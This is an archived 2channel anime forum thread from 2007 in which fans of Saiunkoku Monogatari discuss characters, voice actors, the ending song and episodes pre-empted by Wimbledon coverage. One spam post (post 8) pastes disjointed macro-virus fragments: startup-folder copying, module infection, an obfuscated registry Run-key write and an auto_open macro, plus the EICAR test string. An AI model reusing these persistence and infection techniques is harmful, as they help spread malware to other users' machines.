2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【地上波組専用】彩雲国物語 其の二

1 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 17:31:22 ID:dM9aun4R
原作:雪乃紗衣 イラスト:由羅カイリ (ビーンズ文庫刊)
毎週土曜(金曜深夜)の午前1:10〜1:35に総合テレビで第1シリーズを放送中 (全39話)
第2シリーズは毎週土曜の午前9時00分〜9時25分にNHKBS2にて放送中


ここは第1シリーズ【地上波組専用スレ】です。
ネタバレは禁止です。


■約束・注意
・原作、第2シリーズのネタバレ禁止。バレになる話は該当スレでお願いします。
   ※要注意
     ・板違いのラノベ原作儲は空気読め
     ・第2シリーズ中のBS組も同様に地上波組への配慮を
・荒らし、煽りには寛大に(スルー推奨)。
・極度のキャラ萌えや801は専用のスレへ。 >>2-5参照
・テンプレのキャラ説明にはどうしても多少のバレも含みますので、キャストだけを知りたいだけなら読み飛ばしてアニメ公式を参照。

■アニメ公式サイト
NHKアニメワールド
http://www3.nhk.or.jp/anime/saiunkoku/index.html

■先行してる第2シリーズのBS2組用スレ
【BS2】彩雲国物語 父茶八杯目
http://anime2.2ch.net/test/read.cgi/anime/1182331022/
■前スレ
【地上波組専用】彩雲国物語 父茶一杯目
http://anime2.2ch.net/test/read.cgi/anime/1177025034/

2 :【沈黙-ω-】 ◆.0e0wEv5W6 :2007/06/26(火) 17:32:23 ID:csuN0JwX
222222222222222222222222

3 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 17:33:18 ID:dM9aun4R
■関連スレ
雪乃紗衣〜彩雲国物語〜10 [ライトノベル]
http://love6.2ch.net/test/read.cgi/magazin/1179847045/
彩雲国物語はフェミ厨にオカズを提供する雲国彩物語(アンチスレ)
http://anime2.2ch.net/test/read.cgi/anime/1180951774/
■□■彩雲国物語のコスプレについて語るスレ■□■ [コスプレ]
http://anime2.2ch.net/test/read.cgi/cosp/1181230987/
【双花】彩雲国物語で801【双玉】 [801]
http://sakura03.bbspink.com/test/read.cgi/801/1151676907/


■関連サイト
角川公式HP「彩雲国広報局」
http://www.kadokawa.co.jp/saiunkoku/index.php
『彩雲国物語』DVD SPECIAL SITE
http://www.fwinc.co.jp/saiun/
アニメイトTV WEBラジオ『彩雲国物語〜双剣の舞〜』 関智一、緑川光
http://shop.frontierworks.jp/digital/web_radio/detail_076.html

4 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 17:34:21 ID:dM9aun4R
◆オープニングテーマ曲 『はじまりの風』
作詞:路川ひまり/作曲:ID (作曲家)/編曲:YAMAGIMAN/歌:平原綾香
ダウンロード販売で買えます(210円)
ttp://www.ongen.net/search_detail_track/track_id/tr0000228498/
ttp://moocs.com/cs/catalog/moocs_song/detail/sid_mucd11460000000010/1.htm

◆第1シリーズ・エンディングテーマ曲 『最高の片想い』
作詞・作曲:タイナカサチ/編曲:藤井丈司・小山晃平/歌:タイナカサチ
CD発売:ジェネオン エンタテイメント(1,260円)
ttp://www.amazon.co.jp/gp/product/B000GG4EDC/503-3956744-5293565?v=glance&n=561956
ttp://www.7andy.jp/cd/detail?accd=R0203108

◆第2シリーズ・エンディングテーマ曲 『明日へ』
作詞・作曲・歌:照屋 実穂/編曲:フェビアン・レザ・パネ
ダウンロード販売で買えます(156円)
ttp://www.ongen.net/search_detail_track/track_id/tr0001095753/

5 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 17:47:48 ID:dM9aun4R
■キャスト 多少展開バレありなので読み飛ばすように

・紅秀麗(こう しゅうれい) 桑島法子  超名門紅家直系長姫だが貧乏暮らし。官吏を目指す
・紫劉輝(し りゅうき)    関智一    彩雲国国王。昏君のふりをしていたが秀麗と出会い王らしくなってきた。ブラコン
・し静蘭(し せいらん)    緑川光    紅家家人。実は昔流罪になった第二公子清苑
・李絳攸(り こうゆう)    檜山修之  吏部侍郎。紅黎深の養い子。超方向音痴。双花菖蒲の一人
・藍楸瑛(らん しゅうえい) 森川智之  左羽林軍将軍。名門藍家直系。絳攸と同期で悪友。双花菖蒲の一人
・紅邵可(こう しょうか)   池田秀一  家事が苦手な秀麗の父。誰をも黙らせる不味い「父茶」。実は伝説の兇手「黒狼」

・霄太師(しょうたいし)    石井康嗣   王の教育係として金500両で秀麗を雇った張本人。その正体は…
・宋太傅(そうたいふ)     小形満     髭マッチョの武人。静蘭の正体を見抜く
・茶太保(さたいほ)     坂東尚樹    静蘭を担ぎ出そうとして劉輝と秀麗を殺そうとするが失敗する。故人
・珠翠(しゅすい)       岡村明美   後宮筆頭女官。実は兇手「風の狼」の一人。邵可に惚れてる?
・香鈴(こうりん)        仙台エリ    紅貴妃付の女官だったが、茶太保の謀反に独自加担
・藍龍蓮(らん りゅうれん) 木内秀信    楸瑛の弟。横笛を愛する真の天才。しかし変人
・浪燕青(ろう えんせい)  伊藤健太郎  顔に十文字傷。元茶州州牧。静蘭とは昔の知り合いの様だが…
・黄奇人(こう きじん)    中多和宏   戸部尚書。仮面
・紅黎深(こう れいしん)   真殿光昭   吏部尚書。奇人と同期。兄邵可にメロメロで姪をこよなく愛する紅家当主
・杜影月(と えいげつ)    浪川大輔   史上最年少状元及第者。酒を飲むと別人格の陽月になる
・胡蝶(こちょう)        山像かおり  花街のこうが楼の妓女。組連の親分衆の一人
・紅玖琅(こう くろう)     置鮎龍太郎  邵可と黎深の弟
・碧珀明(へき はくめい)  私市淳     秀麗と同期の進士。絳攸に憧れる


6 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 17:49:55 ID:dM9aun4R
    _______________
   |
   |彩雲国国王(紫劉輝)
   |  ┃
   |  ┣━━━┳━┳━━━━━━━━━┳━━━━━┓
   |  三    秘  四              禁        後
   |  師    書  省              軍        宮
   |  ┃    省  ┃              ┣━━┓    |
   |  ┣┳┓ |  ┣┳┳┓          十   左    珠
   |  霄宋茶 紅  仙中門尚          六   右    翠
   |  太太太 邵  洞書下書          衛   羽
   |  師傅保 可  省省省省          |   林
   |               ┃          し    軍
   |               六          静  ┏┻┓
   |               部          蘭  右  左
   |           ┏┳┳╋┳┓          |  |
   |           工刑兵礼戸吏 長       白  黒
   |           部部部部部部 官       将  将
   |                 || は       軍  軍
   |                 黄紅 尚          |
   |                 奇黎 書          藍
   |                 人深   ゚          楸
   |                 || 副          瑛
   |                 景李 長
   |                 柚絳 官
   |                 梨攸 は
   |                     侍
   |     。                郎
   Λ Λ  /                   ゚
  (,,゚Д゚)⊃ ジュウヨウ!
〜/U /
 U U

7 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 17:55:41 ID:dM9aun4R
放送予定

06月30日(土) ウィンブルドン2007の為、放送休止
07月07日(土) ウィンブルドン2007の為、放送休止
07月14日(土) 第11話 恋の病に薬なし

8 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 19:14:21 ID:5A6HPr1d
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


9 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 22:47:07 ID:TjW0clLg
>>1
乙!!
つ【父茶】

10 :風の谷の名無しさん@実況は実況板で:2007/06/26(火) 22:49:09 ID:XlJhRZMJ
>>1


薔薇姫漢方入り饅頭
つ○

11 :風の谷の名無しさん@実況は実況板で:2007/06/27(水) 00:18:34 ID:KEHjnqF8
>>10
さては、コミクス第2巻読んだなwww

12 :風の谷の名無しさん@実況は実況板で:2007/06/27(水) 01:44:17 ID:uT3uWIt+
なになに?買おうっとw

13 :風の谷の名無しさん@実況は実況板で:2007/06/27(水) 23:54:23 ID:bx3yMnw9
>>1
乙です。
つ【氷柱】
2週間も間が空くんですね…(´・ω・`)ショボーン
早く寝れるからまあ良いか…。

14 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 01:30:24 ID:RqMhUt4q
>>1
乙です
つ【米俵百俵】ドゾー

15 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 01:32:37 ID:brxJEK2V
>>1

つ「藁人形」

16 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 02:22:12 ID:U+urEfeH
こ〜ゆ〜♪
キモい主上w

17 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 02:28:52 ID:vmoqjumY
>>1

つ獅子の刺繍をほどこしたハンカチ

18 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 02:55:15 ID:GvvfJdvL
新スレオメ
念を込めてここに打ち付けておきますね

○┼<

19 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 11:06:32 ID:pw0Xwzdh
18見て思い出したんだけど、彼岸花贈るのってどうなの?

20 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 11:34:34 ID:weVMIQme
大丈夫
秀麗の中のkwsmは既に半透明化した白いジャムを送られたこともあったから

21 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 14:56:33 ID:mQpp3B0H
うわー…

22 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 19:26:41 ID:tAB+xnVs
>>19
マジレスすると有毒だし、家が火事になるとか彼岸の頃に咲くからヨミの国の使者とか言われる不吉な花。
それを劉輝がくれたから、と押し花でとっておく秀麗はとてもいい子。

彼岸花と聞くと山口百恵が「まんじゅーしゃかー」と無表情に歌っていたのを思い出す。

23 :風の谷の名無しさん@実況は実況板で:2007/06/28(木) 20:37:44 ID:qnyk/q9j
>>22
19じゃないけど家が家事になるって言われてるのは知らなかった…。
子供の頃、その時期に母親に菊の花あげちゃったことはあるけど
まんじゅしゃげはなかったなー

秀麗は良い子だよね
万が一劉輝とできて子供ができたらどんなになるのか考えちゃうよ…


24 :風の谷の名無しさん@実況は実況板で:2007/06/29(金) 01:25:43 ID:C2pmxnUx
>>20
ねーよww

そういえば劉輝の声が酒焼けしたホストのかすれ声みたいに聞こえる時があって、なんだかヘコむ。

25 :風の谷の名無しさん@実況は実況板で:2007/06/29(金) 12:27:00 ID:N8iFCVDT
それは中の人の声質だ
個人的にはそういう声優がいてもいいと思うがな

26 :風の谷の名無しさん@実況は実況板で:2007/06/29(金) 12:28:48 ID:N8iFCVDT
>>23
ショウカみたいな子供と予想

27 :風の谷の名無しさん@実況は実況板で:2007/06/29(金) 13:31:30 ID:ZQyjj/Cb
>>25
同意
男っぽいキャラならあの声でいいんだよな
劉輝も実は有能でビシッとしてる男って設定だから
キメるときはあの声で合ってると思う

でも劉輝はキメるシーンより
へろへろしたりションボリしたりしてるシーンが増えてきたから
男っぽい声がむしろ違和感になって
うらぶれてるような印象になってしまうのかもねw

これから王としてキメるシーンが増えることを祈る(-人-)

28 :風の谷の名無しさん@実況は実況板で:2007/06/29(金) 18:42:54 ID:mAZxXUde
>>20
mjd?
困ったキモオタもいたもんだな。

29 :風の谷の名無しさん@実況は実況板で:2007/06/29(金) 19:07:00 ID:dcpl/PFc
さて明日からスーパー桑島タイムよ私の下僕ならBSを契約して受信料を払いなさい
  <V>_
.  「,'´  ヽ
. くiミノノリノ)))
.  ヽ.l|`ヮ´l| <「彩雲国物語」1部NHK総合 土曜日1:10より放送
 G ̄.リ. y/リ ^つ  「彩雲国物語」2部NHKBS2 土曜日9:00より放送
 (__.ノ=彩ヽ_ノ.
  /ノ l ヽヽ .
 ∠へ〜w〜-ゝ紅秀麗

 i^y.´   ヽヘ
 |.〈 .リノ^リ)〉 l
 !ノヾd[ン-´ノ]リ<「電脳コイル」NHK教育土曜日18:30より放送
    くi,几i)
    !__,_|
    〈_/、j 天沢勇子

    (シ⌒⌒ヽ
    ((彡^"^ミ)
    ノツノ`∀´∬<「十二国記 風の万里 黎明の空編」NHKBS2火曜日0:25より放送
   ∬( ]つy/フ'、
    ツ__ノ∞、ゝ'
     '|___|
     (ノ ∪ 祥瓊

30 :風の谷の名無しさん@実況は実況板で:2007/06/29(金) 23:20:50 ID:6flglTF3
そういや今日無いのかーがっかり。
こんな時間に仕事から帰ってきて飯食ってこれ見て寝ようかと思ったのに。

31 :風の谷の名無しさん@実況は実況板で:2007/06/30(土) 01:20:03 ID:igj7ONZi
>>30
ガッカリと思いつつ久しぶりに早く眠れる〜と思ったのにこのザマ。
仕方ないからDVD見てる。

32 :風の谷の名無しさん@実況は実況板で:2007/06/30(土) 03:23:45 ID:fZa73+zh
チャンネル合わせたら、休憩中の女子プロが。。。
そうか忘れていた 来週もそれでお休みになるのだったな
ウィンブルドンがんばれー!(誰ともなく応援w)


33 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 01:44:44 ID:rC2OuOE7
BSスレ、盛り上がってていいな…(´・ω・`)ショボーン

34 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 01:48:12 ID:2epzH0MH
>>33                   且
秀くん、おじさんとイイ事しないか?ノ(;´Д`)ハァハァ

35 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 07:55:31 ID:h4b/SOuD
お、おじさん(;´Д`)ハァハァ

36 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 10:14:58 ID:+/n1tGHl
>>34
へたをとって、中の蜜柑の数を当てるゲームか?

37 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 14:08:49 ID:FbDWCN98
>>36
カアワェェ〜

38 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 16:50:20 ID:jKlj15bp
昨日見逃したと思ってたら放送無かったのか・・・
Veohで11話見ちまったよorz

39 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 18:49:00 ID:OiuXAH13
実は来週もないんだ…

40 :風の谷の名無しさん@実況は実況板で:2007/07/01(日) 19:22:21 ID:tDQdU3zH



 |:::|::|__    、-'''"´ ̄ ̄`"''''-、   __|_::::||
__|::::|::|_|_   / /       \ \|::::||;;;||..  ___ .___
m|::|::|::::|_/   ● ,,.  .,, ●    ヽ:||::::::_|__|_ | |iiii
::::||::::|;;;;;|.     (__人__)     |目;;‖|≡| ̄|iiii
::::||::::|旦''-、、,,,,,,______,,,,,,、、-'' 超巨大ショボーン
------------------------------------------------------


41 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 01:25:41 ID:O08IJJCw
11話は、おじさん出てくるから楽しみ〜♪
自分は彩雲国の中ではおじさんが一番好きなキャラかもしれんwww

しかし、来週も放映がないなんて…orz



42 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 02:40:35 ID:VuOGbXyZ
>>1
乙です。

この時期は毎年テニス楽しみなんだけど、彩雲国も見たいよ‥。
静蘭が見たい‥orz。


43 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 03:05:11 ID:0y77XJm3
モマエラ!EDの歌詞ってまじで凄いと思わないか!?
カラオケで入れてみたんだが…
まさに“最高の片想い”だわこりゃと。
まじで主上の一途っぷりにピッタシだった。

44 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 09:01:51 ID:Vy/NRhwe
もしもあなたがー悲しいのなら〜
明日が少し見えないのならー
頼って欲しい〜私はきっと〜♪
これからもあなたを想うー♪

45 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 09:25:38 ID:f6LfhIaM
主上がヒロインじゃなかろーか?

46 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 09:33:21 ID:rq93lYcF
じゃあおじさんがヒーロー?

47 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 09:51:27 ID:U0r2qRJX
>>43
2番の歌詞もいいよな

48 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 10:19:20 ID:f6LfhIaM
>>46
ライバルじゃないかな?
ヒーロー秀麗を取り合う仲

49 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 17:37:05 ID:O08IJJCw
劉輝と静蘭って、どっちが人気あるんだろ?
何気に静蘭って人気あるよね。
って、自分も静蘭の方が好きなんだがw

50 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 18:39:28 ID:jd6L4cz1
キャラ多すぎで人気とかわからん
さいもえで一番上だったのはコウユウだったっけ?
次がおじさん?

51 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 18:51:12 ID:vYUJRz8Q
燕青にイピョウ

つ◇

52 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 18:52:58 ID:vYUJRz8Q
劉輝か静蘭かどっちかって言うと・・・・静蘭かなぁ

53 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 19:18:51 ID:O08IJJCw
>>50
へぇ〜、紅一族の男子の人気が高いんだね〜
教えてくれて、ありがd!


54 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 19:46:16 ID:9ZeVGU29
茶朔洵だーいすき

55 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 20:15:36 ID:trFzZc3x
自分は劉輝か静蘭どちらかなら…奇人かなぁ

56 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 20:54:49 ID:VuOGbXyZ
劉輝か静蘭か‥。
静蘭の大きな愛が気になるし、紫色の髪も好きだから静蘭がいいなー。
「お嬢様」と言われたい。

原作知らないんだけど、静蘭はなぜ流罪(字合ってるかな)になったの?

57 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 21:08:45 ID:w+PrhbSU
静蘭すきだけど、断然劉輝派だな。
最後、見ていて泣きそうになったので幸せになってホスィと思って。

58 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 21:10:48 ID:Zi/lYURY
>56
確か、母方の祖父が余計な事したせいで謀反の疑いが掛かって、それで流罪になったはず。
静蘭と一緒に母親も流刑になってるよ。

59 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 21:18:50 ID:jOQnQmzn
劉輝は天然でかわいいやつだなぁ〜と思う
静蘭は黒いからなぁ…しかし黒いところがまた…

60 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 21:26:24 ID:pQvAtNE4
>>58
それって、
これから先に出てくる話じゃなかったっけ?

61 :56:2007/07/02(月) 21:50:27 ID:VuOGbXyZ
>>58
ありがとう!母親って生存してたのか‥。

>>60
知らなかったとはいえ、ネタバレにつながるようなこと聞いてごめんなさい。

62 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 21:54:20 ID:Zi/lYURY
>60
マンガ版の彩雲国2巻に出てくる話なので、大丈夫かと思ったんだけど、アニメじゃ出てこなかったっけ?
あ、母親は…ごめん、これ以上は墓穴掘るから言わない事にする。

63 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 22:50:27 ID:MOhF8JE+
>56
話がだいぶ進んでから、そこに触れる回がでてくるので
今は気にせずに
静蘭が過去を振り返る回をお楽しみに・・・静蘭ファンには泣けます

64 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 22:51:40 ID:MOhF8JE+
sage設定わすれていた ごめん

65 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 23:21:31 ID:pjqmAy2b
>>49
秀麗とくっついて欲しいのも、幸せになって欲しいのも劉輝。
幸せにならなくても出てくるだけで(リアクションが面白くて)ワクワクするのが静蘭。
どっちも大好きだけど、真面目で器用なダメ男が好きだから個人的には静蘭の方が好き。
でも、世間一般では2人より絳攸が人気だと思う…多分…迷子だから

66 :風の谷の名無しさん@実況は実況板で:2007/07/02(月) 23:43:38 ID:KZorQskA
静蘭黒いところが好きだ(´Д`;)
粘着質なところとか

67 :56:2007/07/02(月) 23:56:15 ID:VuOGbXyZ
>>63
ありがとうございます。
その回はハンカチ用意ですね。

68 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 00:40:10 ID:2yyLYA4X
>>65さんの
秀麗とくっついて欲しいのも、幸せになって欲しいのも劉輝
っていうのに同意。
ほかには楸瑛が好きだ。あのセリフまわしと声がいい。
でも、ここでは人気ないねー。

69 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 01:48:25 ID:y/CvLCep
>>68
ノシ
しゅーえーは余裕があってたまらん。
「〜だね。」と言われると幸せ。

今まで再放送三話終わる毎にDVD一巻買って復習してたけど
なんだか段々待ち切れなくなって先走り気味。
だのにニ週もお休みなんて…ウック

70 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 08:07:13 ID:7yZbTYuo
アニメ愀瑛はソツがなさ過ぎるから人気がないと思われる。あとなんか作画の顔が崩れてるからイマイチかっこよく見えない…。。
自分も愀瑛か絳攸かと聞かれたら絳攸派だ。

71 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 14:44:41 ID:CCwKSwS9
愀瑛は
・面相筆ですっすっと横に二本線引いたような妙にあっさりした目元
・横向いた時に時々妙に目立つ生え際

これが凄い惜しい。何も由羅絵そっくりでなくていいんだ。
アニメ絵はアニメ絵としての良さがあると思うし。
でもなんか愀瑛はあとちょっとだけ作画がんばればもっと良くなるだろうに
もったいない・・・という感じ。
それ以外は別に問題なくて声も凄く嵌ってると思うんだ。

72 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 16:07:29 ID:rAOFH8gO
>妙にあっさりした目元
好きだなぁ・・・漫画の艶っぽさ3倍増の方も好きだけど

龍蓮登場のときに迷子と押し付けあってる時に
線一本のキツネ目になった顔なんか大好きだ

73 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 20:29:19 ID:/yEWIDyx
生え際は楸瑛のチャームポイントだよ。
髪を大事にしてる裏設定とかないかな。

74 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 20:50:17 ID:cikFZbMD
>>73
アニメ設定やキャラデザ設定が
どうなってるのかは分からないけど
原作ではそういう設定なかったよ

原作には楸瑛の髪どころか
容姿に関する描写自体が全く存在していないから

75 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 21:12:36 ID:Uljpb4be
楸瑛は武官だから、それも地位は結構↑で
だから髪もいつもちきんと結わえているのだろうと、思ってみていた
生え際とかなんだとか、まったく意識してみてなかった。
あれで充分かっこいいと思っていた私は
少数派だったのか


76 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 21:33:37 ID:/yEWIDyx
>>74
原作挿絵だと楸瑛はロンゲverが多いよね。
絳攸美形どころか美貌設定と、女装大会優勝という裏?設定に笑った。

77 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 22:40:05 ID:kEBChmCy
原作挿絵のロンゲ楸瑛は美しくてスキ。
でも楸瑛って出来過ぎな感じというか、隙がないという感じで、あまりくすぐられるところがない気がする。
そんな自分も迷子の方がスキw

いろんな美形を描き分ける由羅サンはすごいなと思う。
由羅サンのイラストあっての、アニメのキャラデザだもんね。

78 :風の谷の名無しさん@実況は実況板で:2007/07/04(水) 23:06:40 ID:BZlMqdao
では、楸瑛は私が引き取ることにしよう

79 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 00:37:50 ID:oQ2Gc6HK
【恋人】愀瑛
【夫】絳攸or奇人
【兄】静蘭
【弟】劉輝
【親友】燕青,龍蓮
【先生】劭可
あぁ!おじさんのポジションがない…
まだ地上波では出て来てないけど、【父】は玖琅がいいです。

80 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 01:06:21 ID:4F+zPCAg
おじさんのポジションは【おじさん】じゃだめなの?w

81 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 01:34:07 ID:RMJDRzER
自分は、79さんの恋人と兄を逆にしたのがいいなぁw
玖琅は父でも良いけど、上司でもいいかも。

おじさんは、おじさんってポジションも良いけど義父のポジションも良いw
となったら必然的に夫は迷子になっちゃうけどw

82 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 01:35:25 ID:oQ2Gc6HK
>>80
おじさんは劭可が【父】ポジションでないと、ポジション【おじさん】は発動されなさそうで…。。
おじさんは好きなキャラだけど、単なる黎深は怖過ぎるとオモ。


83 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 01:49:53 ID:j/hyczgu
>>82
>単なる黎深
www
たしかに

84 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 01:51:29 ID:U3JhTH17
次の回の放送みたら
みんな おじさんにホレるよ もうカワイイから
あぁ、おじさんおじさん早く会いたい

85 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 02:22:42 ID:RMJDRzER
>単なる黎深

ええと、恥ずかしがりやで、大好きなモノ以外はどうでも良くて、その気になればとてもよくできるおじさん?w

86 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 02:57:45 ID:j/hyczgu
>>85
大好きなモノ以外はどうでも良くて、
その気になればとてもよくできるけどその気にならず
気に入らない者には兇手を送って始末する
あるいは腐った卵を送付する

こわーいおじさん

87 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 03:22:00 ID:xubhyvfG
・原作、第2シリーズのネタバレ禁止。バレになる話は該当スレでお願いします。
   ※要注意
     ・板違いのラノベ原作儲は空気読め
     ・第2シリーズ中のBS組も同様に地上波組への配慮を

88 :風の谷の名無しさん@実況は実況板で:2007/07/05(木) 13:14:46 ID:rZ24Rg9E
こわいこわい

89 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 01:27:07 ID:6bAdgWXT
龍蓮また出てこないかな〜、楸瑛が崩れるからさ。

90 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 03:04:08 ID:X6Zk6wwa
EDの涙も我慢してるんだろう〜の劉輝いいよね

91 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 08:26:46 ID:jhtaHxLs
劉輝乙女すぎるよ劉輝

92 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 12:52:27 ID:UcR1A9ly
劉輝って両刀でヤりまくってるのに、ヒロインよりも乙女思考で健気だからついつい応援したくなっちゃうんだよな。
そうじゃなければ、秀麗が誰とくっつこうが別にどうでもいい。

93 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 12:55:07 ID:UfuyvJL+
ぐ…

流石に二週跨ぎはキツいぜ…

94 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 13:04:20 ID:rzByzt5g
>>92
わかるw
乙女思考のせいでバイ設定とか忘れそうだよ…


95 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 21:57:59 ID:jhtaHxLs
楸瑛に
「では、恋は?」
と聞かれて頬を染めて目をそらした劉輝はとんでもなく可愛かった…

96 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 22:32:21 ID:kwxO2gUh
リアルであんな男いたらムカツクけどね
劉輝大好き

97 :風の谷の名無しさん@実況は実況板で:2007/07/06(金) 23:45:50 ID:sg4gSpNO
>>96
リアルじゃ誰も彩雲国の中みたいな人はいないと思うが・・・
逆にだから少女向けラノベとして面白いと思うんだが。

98 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 00:07:02 ID:v0i1b6YM
今日は中止か?


99 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 00:08:07 ID:75WxZJZJ
劉輝って秀麗と出会ってからは誰ともヤってないんじゃないの?

100 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 00:08:10 ID:v22m4Lcz
おじさんや奇人や龍蓮みたいなのが現実にいたら…

101 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 00:14:40 ID:SRMUcp07
>>100
そしてソレらが上司だったりした日にゃ・・・

102 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 00:15:21 ID:46/bZ/fT
今週もか!
酒飲んで曲だけ聴いて寝るか・・・はあ・・・。

103 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 00:27:01 ID:v22m4Lcz
>>101
奇人は仮面被ってるだけで仕事はきちんとやる人だからおk

104 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 08:44:53 ID:+seEuEkG
>>103
イヤ、普通仕事出来ても仮面で引くってば。

105 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 09:50:14 ID:Aw1Ft2oX
まず履歴書の写真が問題だ

106 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 15:10:24 ID:bAkMSmPb
履歴書だから素顔の写真のせるんだよね


107 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 17:24:48 ID:Lk9PBxDX
なんとかフラッシュは写真でも効力あるのだろうか

108 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 21:16:02 ID:HCobK8JI
きっと光りすぎて写ってないんだよ

109 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 23:10:54 ID:ojR25rQx
そんなんおもいきし落とされるし
速攻お祈りが届くねきっと

110 :風の谷の名無しさん@実況は実況板で:2007/07/07(土) 23:37:12 ID:RIfiYkfX
さっき必殺仕事人見たら、中村主水が書庫番になってた…。
ますます父茶を彷彿とさせる(つ∀`)

111 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 01:22:48 ID:ZCcwQJaw
>>110
ノシ

>>107
なんとかフラッシュとは?

112 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 01:31:05 ID:KR95HWZG
イケメンフラッシュ?

113 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 01:39:20 ID:Dr59+sBg
一応地上波スレだから先行ネタばっかだと初視聴組にネタバレと混乱が……
皆気にしないなら良いけど

